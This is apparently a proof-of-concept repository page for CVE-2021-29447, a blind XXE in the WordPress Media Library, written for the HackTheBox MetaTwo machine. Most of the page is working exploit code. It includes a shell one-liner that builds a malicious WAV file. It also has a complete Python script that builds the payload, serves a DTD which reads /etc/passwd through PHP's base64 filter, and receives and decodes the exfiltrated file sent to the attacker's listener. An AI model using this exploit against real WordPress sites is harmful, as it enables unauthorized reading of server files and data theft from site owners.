
CVE-2021-29447 PoC — WordPress Authenticated XXE attack when installation is running PHP 8

Associated Vulnerability
Title: WordPress Authenticated XXE attack when installation is running PHP 8 (CVE-2021-29447)
Description: WordPress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires the WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
Description
Arbitrary file read controller based on CVE-2021-29447
Readme
## Blind XXE controller

I made this controller while working on the metatwo machine on HackTheBox to exploit CVE-2021-29447, a WordPress XXE vulnerability in the Media Library affecting versions 5.7, 5.6.2, 5.6.1, 5.6 and 5.0.11. An authenticated user with permission to upload to the Media Library can upload a malicious WAV file, which leads to arbitrary file read on the server and server-side request forgery (SSRF). As the advisory above notes, the target must be running PHP 8.

Exploiting this vulnerability takes several steps, because the result of parsing the iXML metadata is never sent back to the user: a blind XXE payload is required. The iXML chunk of the WAV file declares a parameter entity that points to an external Document Type Definition (DTD) hosted on the attacker's server; that DTD reads the target file and defines a further entity whose URL carries the file's contents, base64 encoded, so the parser exfiltrates the data by making an HTTP request back to the attacker. Once the WAV file is uploaded, wait for the HTTP request containing the base64 encoded content of the target file (e.g. /etc/passwd) and decode it. This controller handles all of these steps: you only need to type the filename at the controller's **$console >** prompt.

Detailed blog [https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/](https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/)


Note: This controller is fully configured for the HTB metatwo machine. To use it anywhere else you will need to make some changes to the scripts.

### Usage

Create a WAV file named **payload.wav** (replace YOUR_IP with the address the controller listens on):

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

Run **main.py**, passing the IP address it should listen on (the address used as YOUR_IP in the payload):

```bash
python3 main.py listen_ip
```
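As an added example (not the repository's main.py, whose source is not reproduced on this page), the following Python script carries out the three steps described above in one place: it writes payload.wav with RIFF and iXML chunk sizes computed from the actual XML length instead of the fixed sizes in the echo one-liner, serves evil.dtd from the listening address, and decodes the base64 callback. The listening port 8000 and the /evil.dtd path match the payload above; the `?p=` query parameter name, the script name and the use of the `php://filter/convert.base64-encode` wrapper to make the file contents safe to embed in a URL are assumptions of this example.

```python
"""Blind XXE helper for CVE-2021-29447 (added example, not the repository's main.py).

Assumes the target fetches http://<listen_ip>:8000/evil.dtd and then calls back to
http://<listen_ip>:8000/?p=<base64 of the target file>; both names are assumptions.
"""
import base64
import struct
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import unquote, urlsplit


def build_payload_wav(listen_ip: str, port: int = 8000) -> bytes:
    """Build a minimal RIFF/WAVE file whose only chunk is an iXML chunk.

    The XML in the chunk is the same as in the echo one-liner: a DOCTYPE that loads
    the attacker's DTD (%remote;) and then expands the entities it defines.
    Chunk sizes are computed rather than hard-coded so any listen_ip length works.
    """
    xml = (
        '<?xml version="1.0"?>'
        "<!DOCTYPE ANY["
        f"<!ENTITY % remote SYSTEM 'http://{listen_ip}:{port}/evil.dtd'>"
        "%remote;%init;%trick;]>"
    ).encode()
    data = xml + b"\x00"  # trailing NUL, mirroring the original one-liner
    pad = b"\x00" if len(data) % 2 else b""  # RIFF pads odd-sized chunks to even length
    chunk = b"iXML" + struct.pack("<I", len(data)) + data + pad  # size excludes the pad byte
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body  # RIFF size = bytes after this field


def build_evil_dtd(listen_ip: str, target_file: str = "/etc/passwd", port: int = 8000) -> str:
    """DTD served at /evil.dtd.

    %file reads the target through PHP's base64 filter so newlines and special
    characters survive inside a URL; %init defines %trick (&#x25; is a literal '%'),
    whose SYSTEM URL carries the encoded file back to the listener when expanded.
    """
    return (
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target_file}">\n'
        f"<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://{listen_ip}:{port}/?p=%file;'>\">\n"
    )


def decode_exfil(request_path: str) -> Optional[bytes]:
    """Extract and decode the base64 payload from a callback path such as '/?p=cm9v...'."""
    query = urlsplit(request_path).query
    for part in query.split("&"):
        if part.startswith("p="):
            b64 = unquote(part[2:])  # unquote, not unquote_plus: '+' is base64 data, not a space
            b64 += "=" * (-len(b64) % 4)  # restore padding if it was dropped in transit
            return base64.b64decode(b64)
    return None


class Handler(BaseHTTPRequestHandler):
    listen_ip = "127.0.0.1"
    port = 8000
    target_file = "/etc/passwd"

    def do_GET(self):
        if self.path == "/evil.dtd":
            body = build_evil_dtd(self.listen_ip, self.target_file, self.port).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        data = decode_exfil(self.path)
        self.send_response(200)
        self.end_headers()
        if data is not None:
            sys.stdout.write(f"--- {self.target_file} ---\n{data.decode(errors='replace')}\n")

    def log_message(self, *args):  # keep the console limited to decoded files
        pass


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: xxe_listener.py listen_ip [target_file]")
    Handler.listen_ip = sys.argv[1]
    if len(sys.argv) > 2:
        Handler.target_file = sys.argv[2]
    with open("payload.wav", "wb") as f:
        f.write(build_payload_wav(Handler.listen_ip, Handler.port))
    print("wrote payload.wav; upload it to the Media Library and wait for the callback")
    HTTPServer(("0.0.0.0", Handler.port), Handler).serve_forever()
```

Run it as `python3 xxe_listener.py 10.10.14.5 /etc/passwd`, upload the generated payload.wav through the Media Library, and the decoded file is printed when the callback arrives. The decoder deliberately uses `unquote` rather than `unquote_plus`: `+` is a valid base64 character, and treating it as a space would corrupt the recovered file.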

#### POC image

![/poc/poc.png](/poc/poc.png)